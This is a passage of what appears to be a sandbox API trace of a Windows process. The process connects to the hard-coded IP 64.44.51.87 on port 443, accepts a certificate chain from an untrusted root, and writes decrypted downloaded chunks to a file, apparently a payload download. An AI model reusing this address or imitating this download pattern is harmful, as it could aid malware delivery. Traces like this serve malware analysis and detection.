[5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec7d0) returned 1 [0069.490] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f7200, cbSid=0x1c8ec7d0 | out: pSid=0x30f7200*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec7d0) returned 1 [0069.490] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f8010, cbSid=0x1c8ec7d0 | out: pSid=0x30f8010*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec7d0) returned 1 [0069.491] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f8e20, cbSid=0x1c8ec780 | out: pSid=0x30f8e20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec780) returned 1 [0069.491] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f9c48, cbSid=0x1c8ec780 | out: pSid=0x30f9c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec780) returned 1 [0069.491] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30faa40, cbSid=0x1c8ec780 | out: pSid=0x30faa40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec780) returned 1 [0069.491] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30fb848, cbSid=0x1c8ec780 | out: pSid=0x30fb848*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec780) returned 1 [0069.491] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30fc648, cbSid=0x1c8ec780 | out: pSid=0x30fc648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec780) returned 1 [0069.493] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410 [0069.493] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x1c8ecdb8 | out: argp=0x1c8ecdb8) returned 0 [0069.494] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x41c [0069.494] ioctlsocket (in: s=0x41c, cmd=-2147195266, argp=0x1c8ecdb8 | out: argp=0x1c8ecdb8) returned 0 [0069.494] WSAIoctl (in: s=0x410, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8ecd30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8ecd30, lpOverlapped=0x0) returned -1 [0069.495] CoTaskMemAlloc (cb=0x204) returned 0xe6a20 [0069.495] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xe6a20, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0069.496] CoTaskMemFree (pv=0xe6a20) [0069.496] WSAEventSelect (s=0x410, hEventObject=0x418, lNetworkEvents=512) returned 0 [0069.496] WSAIoctl (in: s=0x41c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8ecd30, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8ecd30, lpOverlapped=0x0) returned -1 [0069.496] CoTaskMemAlloc (cb=0x204) returned 0xe6a20 [0069.496] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xe6a20, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0069.496] CoTaskMemFree (pv=0xe6a20) [0069.496] WSAEventSelect (s=0x41c, hEventObject=0x420, lNetworkEvents=512) returned 0 [0069.497] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x424, param_3=0x3) returned 0x0 [0069.501] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c8ece70 | out: phkResult=0x1c8ece70*=0x43c) returned 0x0 [0069.501] RegNotifyChangeKeyValue (hKey=0x440, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x444, fAsynchronous=1) returned 0x0 [0069.501] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0 [0069.502] RegNotifyChangeKeyValue (hKey=0x450, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x454, fAsynchronous=1) returned 0x0 [0069.502] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecce8 | out: TokenHandle=0x1c8ecce8*=0x458) returned 1 [0069.506] GetCurrentProcess () returned 0xffffffffffffffff [0069.506] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec4b8 | out: TokenHandle=0x1c8ec4b8*=0x45c) returned 1 [0069.510] GetCurrentProcess () returned 0xffffffffffffffff [0069.510] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec4b8 | out: TokenHandle=0x1c8ec4b8*=0x460) returned 1 [0069.535] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c8ecdb8 | out: pProxyConfig=0x1c8ecdb8) returned 1 [0069.581] SetEvent (hEvent=0x36c) returned 1 [0069.591] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x1c8ecc90 | out: ppwstrAutoConfigUrl=0x1c8ecc90*=0x0) returned 0 [0069.604] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x1c8ecc90 | out: ppwstrAutoConfigUrl=0x1c8ecc90*=0x0) returned 0 [0072.210] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec528 | out: TokenHandle=0x1c8ec528*=0x4c4) returned 1 [0072.210] GetCurrentProcess () returned 0xffffffffffffffff [0072.210] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec528 | out: TokenHandle=0x1c8ec528*=0x4bc) returned 1 [0072.211] SetEvent (hEvent=0x36c) returned 1 [0072.228] inet_addr (cp="64.44.51.87") returned 0x57332c40 [0072.228] CoTaskMemFree (pv=0x71a50) [0072.229] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8 [0072.230] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4cc [0072.230] ioctlsocket (in: s=0x4c8, cmd=-2147195266, argp=0x1c8ecd58 | out: argp=0x1c8ecd58) returned 0 [0072.230] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d0 [0072.230] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4 [0072.230] ioctlsocket (in: s=0x4d0, cmd=-2147195266, argp=0x1c8ecd58 | out: argp=0x1c8ecd58) returned 0 [0072.230] WSAIoctl (in: s=0x4c8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8eccd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8eccd0, lpOverlapped=0x0) returned -1 [0072.230] CoTaskMemAlloc (cb=0x204) returned 0xe6600 [0072.230] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xe6600, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0072.231] WSAEventSelect (s=0x4c8, hEventObject=0x4cc, lNetworkEvents=512) returned 0 [0072.231] WSAIoctl (in: s=0x4d0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8eccd0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8eccd0, lpOverlapped=0x0) returned -1 [0072.231] CoTaskMemAlloc (cb=0x204) returned 0xe6600 [0072.231] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xe6600, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0072.231] WSAEventSelect (s=0x4d0, hEventObject=0x4d4, lNetworkEvents=512) returned 0 [0072.270] GetAdaptersAddresses () returned 0x6f [0072.285] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b9bd420 [0072.285] GetAdaptersAddresses () returned 0x0 [0072.298] LocalFree (hMem=0x1b9bd420) returned 0x0 [0072.315] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d8 [0072.316] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0072.318] inet_addr (cp="64.44.51.87") returned 0x57332c40 [0072.318] CoTaskMemFree (pv=0x71a50) [0072.320] WSAConnect (in: s=0x4d8, name=0x31079e0*(sa_family=2, sin_port=0x1bb, sin_addr="64.44.51.87"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0072.480] closesocket (s=0x4dc) returned 0 [0072.537] EnumerateSecurityPackagesW (in: pcPackages=0x1c8ec818, ppPackageInfo=0x1c8ec810 | out: pcPackages=0x1c8ec818, ppPackageInfo=0x1c8ec810) returned 0x0 [0072.538] lstrlenW (lpString="Negotiate") returned 9 [0072.538] CoTaskMemAlloc (cb=0x16) returned 0x71ad0 [0072.538] RtlMoveMemory (in: Destination=0x71ad0, Source=0xc7510, Length=0x14 | out: Destination=0x71ad0) [0072.538] CoTaskMemFree (pv=0x71ad0) [0072.538] FreeContextBuffer (in: pvContextBuffer=0xc73d0 | out: pvContextBuffer=0xc73d0) returned 0x0 [0072.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec2f8 | out: TokenHandle=0x1c8ec2f8*=0x4dc) returned 1 [0072.553] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x310bb88, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c8ec208, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c8ec1f8, ptsExpiry=0x1c8ec1f0 | out: phCredential=0x1c8ec1f8, ptsExpiry=0x1c8ec1f0) returned 0x0 [0072.560] InitializeSecurityContextW (in: phCredential=0x1c8ec400, phContext=0x0, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c8ec3f0, pOutput=0x310e2d0, pfContextAttr=0x1c8ec3e8, ptsExpiry=0x1c8ec3e0 | out: phNewContext=0x1c8ec3f0, pOutput=0x310e2d0, pfContextAttr=0x1c8ec3e8, ptsExpiry=0x1c8ec3e0) returned 0x90312 [0072.560] FreeContextBuffer (in: pvContextBuffer=0x1b996fe0 | out: pvContextBuffer=0x1b996fe0) returned 0x0 [0072.608] send (in: s=0x4d8, buf=0x310e3a0*, len=95, flags=0 | out: buf=0x310e3a0*) returned 95 [0072.610] recv (in: s=0x4d8, buf=0x310e3a0, len=5, flags=0 | out: buf=0x310e3a0*) returned 5 [0072.757] recv (in: s=0x4d8, buf=0x310e3a5, len=81, flags=0 | out: buf=0x310e3a5*) returned 81 [0072.758] InitializeSecurityContextW (in: phCredential=0x1c8ec320, phContext=0x1c8ec5d0, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x310e698, Reserved2=0x0, phNewContext=0x1c8ec310, pOutput=0x310e6b8, pfContextAttr=0x1c8ec308, ptsExpiry=0x1c8ec300 | out: phNewContext=0x1c8ec310, pOutput=0x310e6b8, pfContextAttr=0x1c8ec308, ptsExpiry=0x1c8ec300) returned 0x90312 [0072.758] recv (in: s=0x4d8, buf=0x310e7a8, len=5, flags=0 | out: buf=0x310e7a8*) returned 5 [0072.758] recv (in: s=0x4d8, buf=0x310e7cd, len=875, flags=0 | out: buf=0x310e7cd*) returned 875 [0072.758] InitializeSecurityContextW (in: phCredential=0x1c8ec250, phContext=0x1c8ec500, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x310ec08, Reserved2=0x0, phNewContext=0x1c8ec240, pOutput=0x310ec28, pfContextAttr=0x1c8ec238, ptsExpiry=0x1c8ec230 | out: phNewContext=0x1c8ec240, pOutput=0x310ec28, pfContextAttr=0x1c8ec238, ptsExpiry=0x1c8ec230) returned 0x90312 [0072.759] recv (in: s=0x4d8, buf=0x310ed18, len=5, flags=0 | out: buf=0x310ed18*) returned 5 [0072.759] recv (in: s=0x4d8, buf=0x310ed3d, len=4, flags=0 | out: buf=0x310ed3d*) returned 4 [0072.759] InitializeSecurityContextW (in: phCredential=0x1c8ec180, phContext=0x1c8ec430, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x310ee18, Reserved2=0x0, phNewContext=0x1c8ec170, pOutput=0x310ee38, pfContextAttr=0x1c8ec168, ptsExpiry=0x1c8ec160 | out: phNewContext=0x1c8ec170, pOutput=0x310ee38, pfContextAttr=0x1c8ec168, ptsExpiry=0x1c8ec160) returned 0x90312 [0072.760] FreeContextBuffer (in: pvContextBuffer=0x1b9ac4e0 | out: pvContextBuffer=0x1b9ac4e0) returned 0x0 [0072.760] send (in: s=0x4d8, buf=0x310ef08*, len=326, flags=0 | out: buf=0x310ef08*) returned 326 [0072.760] recv (in: s=0x4d8, buf=0x310ef08, len=5, flags=0 | out: buf=0x310ef08*) returned 5 [0072.912] recv (in: s=0x4d8, buf=0x310ef0d, len=1, flags=0 | out: buf=0x310ef0d*) returned 1 [0072.912] InitializeSecurityContextW (in: phCredential=0x1c8ec0b0, phContext=0x1c8ec360, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x310f140, Reserved2=0x0, phNewContext=0x1c8ec0a0, pOutput=0x310f160, pfContextAttr=0x1c8ec098, ptsExpiry=0x1c8ec090 | out: phNewContext=0x1c8ec0a0, pOutput=0x310f160, pfContextAttr=0x1c8ec098, ptsExpiry=0x1c8ec090) returned 0x90312 [0072.912] recv (in: s=0x4d8, buf=0x310f250, len=5, flags=0 | out: buf=0x310f250*) returned 5 [0072.912] recv (in: s=0x4d8, buf=0x310f275, len=48, flags=0 | out: buf=0x310f275*) returned 48 [0072.912] InitializeSecurityContextW (in: phCredential=0x1c8ebfe0, phContext=0x1c8ec290, pTargetName=0x30e41b8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x310f378, Reserved2=0x0, phNewContext=0x1c8ebfd0, pOutput=0x310f398, pfContextAttr=0x1c8ebfc8, ptsExpiry=0x1c8ebfc0 | out: phNewContext=0x1c8ebfd0, pOutput=0x310f398, pfContextAttr=0x1c8ebfc8, ptsExpiry=0x1c8ebfc0) returned 0x0 [0072.919] QueryContextAttributesW (in: phContext=0x1c8ec240, ulAttribute=0x4, pBuffer=0x310f4b0 | out: pBuffer=0x310f4b0) returned 0x0 [0072.919] QueryContextAttributesW (in: phContext=0x1c8ec240, ulAttribute=0x5a, pBuffer=0x310f530 | out: pBuffer=0x310f530) returned 0x0 [0072.925] QueryContextAttributesW (in: phContext=0x1c8ec0f0, ulAttribute=0x53, pBuffer=0x310f880 | out: pBuffer=0x310f880) returned 0x0 [0072.938] CertDuplicateCRLContext (pCrlContext=0x1b9971b0) returned 0x1b9971b0 [0072.940] CertDuplicateStore (hCertStore=0xd44d0) returned 0xd44d0 [0072.941] CertEnumCertificatesInStore (hCertStore=0xd44d0, pPrevCertContext=0x0) returned 0x1b9971b0 [0072.941] CertDuplicateCRLContext (pCrlContext=0x1b9971b0) returned 0x1b9971b0 [0072.942] CertEnumCertificatesInStore (hCertStore=0xd44d0, pPrevCertContext=0x1b9971b0) returned 0x0 [0072.942] CertCloseStore (hCertStore=0xd44d0, dwFlags=0x0) returned 1 [0072.942] CertFreeCRLContext (pCrlContext=0x1b9971b0) returned 1 [0072.947] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0xd4400 [0072.947] CertAddCRLLinkToStore (in: hCertStore=0xd4400, pCrlContext=0x1b9971b0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0072.964] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b9971b0, pTime=0x1c8ec0f8, hAdditionalStore=0xd4400, pChainPara=0x1c8ec100, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c8ec0f0 | out: ppChainContext=0x1c8ec0f0) returned 1 [0080.196] CertDuplicateCertificateChain (pChainContext=0x1ce092e0) returned 0x1ce092e0 [0080.197] CertDuplicateCRLContext (pCrlContext=0x1b9971b0) returned 0x1b9971b0 [0080.199] GetUserDefaultLCID () returned 0x409 [0080.199] CertFreeCertificateChain (pChainContext=0x1ce092e0) [0080.200] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce092e0, pPolicyPara=0x1c8ec278, pPolicyStatus=0x1c8ec258 | out: pPolicyStatus=0x1c8ec258) returned 1 [0080.201] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce092e0, pPolicyPara=0x1c8ec350, pPolicyStatus=0x1c8ec338 | out: pPolicyStatus=0x1c8ec338) returned 1 [0080.201] GetUserDefaultLCID () returned 0x409 [0080.201] CoTaskMemAlloc (cb=0x404) returned 0x1ce513c0 [0080.201] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x800b0109, dwLanguageId=0x409, lpBuffer=0x1ce513c0, nSize=0x1ff, Arguments=0x0 | out: lpBuffer="A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.\r\n") returned 0x71 [0080.202] CoTaskMemFree (pv=0x1ce513c0) [0080.203] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce092e0, pPolicyPara=0x1c8ec120, pPolicyStatus=0x1c8ec108 | out: pPolicyStatus=0x1c8ec108) returned 1 [0080.203] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce092e0, pPolicyPara=0x1c8ec120, pPolicyStatus=0x1c8ec108 | out: pPolicyStatus=0x1c8ec108) returned 1 [0080.203] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce092e0, pPolicyPara=0x1c8ec120, pPolicyStatus=0x1c8ec108 | out: pPolicyStatus=0x1c8ec108) returned 1 [0080.368] CertFreeCertificateChain (pChainContext=0x1ce092e0) [0080.368] CertFreeCRLContext (pCrlContext=0x1b9971b0) returned 1 [0080.371] EncryptMessage (in: phContext=0x1c8ec830, fQOP=0x0, pMessage=0x31131c8, MessageSeqNo=0x0 | out: pMessage=0x31131c8) returned 0x0 [0080.372] send (in: s=0x4d8, buf=0x3112f10*, len=101, flags=0 | out: buf=0x3112f10*) returned 101 [0080.383] setsockopt (s=0x4d8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0080.384] recv (in: s=0x4d8, buf=0x3113328, len=5, flags=0 | out: buf=0x3113328*) returned 5 [0080.536] recv (in: s=0x4d8, buf=0x311334d, len=288, flags=0 | out: buf=0x311334d*) returned 288 [0080.537] DecryptMessage (in: phContext=0x1c8ec3f0, pMessage=0x3113580, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3113580, pfQOP=0x0) returned 0x0 [0080.561] setsockopt (s=0x4d8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0080.562] recv (in: s=0x4d8, buf=0x3113348, len=5, flags=0 | out: buf=0x3113348*) returned 5 [0080.562] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 14302 [0080.562] recv (in: s=0x4d8, buf=0x312820b, len=2114, flags=0 | out: buf=0x312820b*) returned 2114 [0080.861] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3128b60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3128b60, pfQOP=0x0) returned 0x0 [0080.864] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0080.865] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0080.866] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0080.866] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3128d50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3128d50, pfQOP=0x0) returned 0x0 [0080.866] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0080.867] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0080.867] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0080.869] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3128f40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3128f40, pfQOP=0x0) returned 0x0 [0080.869] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0080.870] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0080.870] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 13219 [0080.870] recv (in: s=0x4d8, buf=0x3127dd0, len=3197, flags=0 | out: buf=0x3127dd0*) returned 3197 [0081.017] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129130, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129130, pfQOP=0x0) returned 0x0 [0081.017] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0081.018] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0081.018] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 7018 [0081.018] recv (in: s=0x4d8, buf=0x3126597, len=9398, flags=0 | out: buf=0x3126597*) returned 9398 [0081.029] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129320, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129320, pfQOP=0x0) returned 0x0 [0081.030] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0081.030] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0081.030] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 2277 [0081.030] recv (in: s=0x4d8, buf=0x3125312, len=14139, flags=0 | out: buf=0x3125312*) returned 14139 [0081.170] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129510, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129510, pfQOP=0x0) returned 0x0 [0081.171] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0081.171] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0081.171] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 1916 [0081.171] recv (in: s=0x4d8, buf=0x31251a9, len=14500, flags=0 | out: buf=0x31251a9*) returned 8760 [0081.832] recv (in: s=0x4d8, buf=0x31273e1, len=5740, flags=0 | out: buf=0x31273e1*) returned 1460 [0081.880] recv (in: s=0x4d8, buf=0x3127995, len=4280, flags=0 | out: buf=0x3127995*) returned 4280 [0081.881] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129700, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129700, pfQOP=0x0) returned 0x0 [0081.882] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0081.883] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0081.883] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0081.884] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x31298f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x31298f0, pfQOP=0x0) returned 0x0 [0081.884] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0081.884] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0081.884] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 4114 [0081.884] recv (in: s=0x4d8, buf=0x3125a3f, len=12302, flags=0 | out: buf=0x3125a3f*) returned 12302 [0082.034] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129ae0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129ae0, pfQOP=0x0) returned 0x0 [0082.043] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.044] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.044] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 9593 [0082.044] recv (in: s=0x4d8, buf=0x3126fa6, len=6823, flags=0 | out: buf=0x3126fa6*) returned 3472 [0082.181] recv (in: s=0x4d8, buf=0x3127d36, len=3351, flags=0 | out: buf=0x3127d36*) returned 3351 [0082.181] 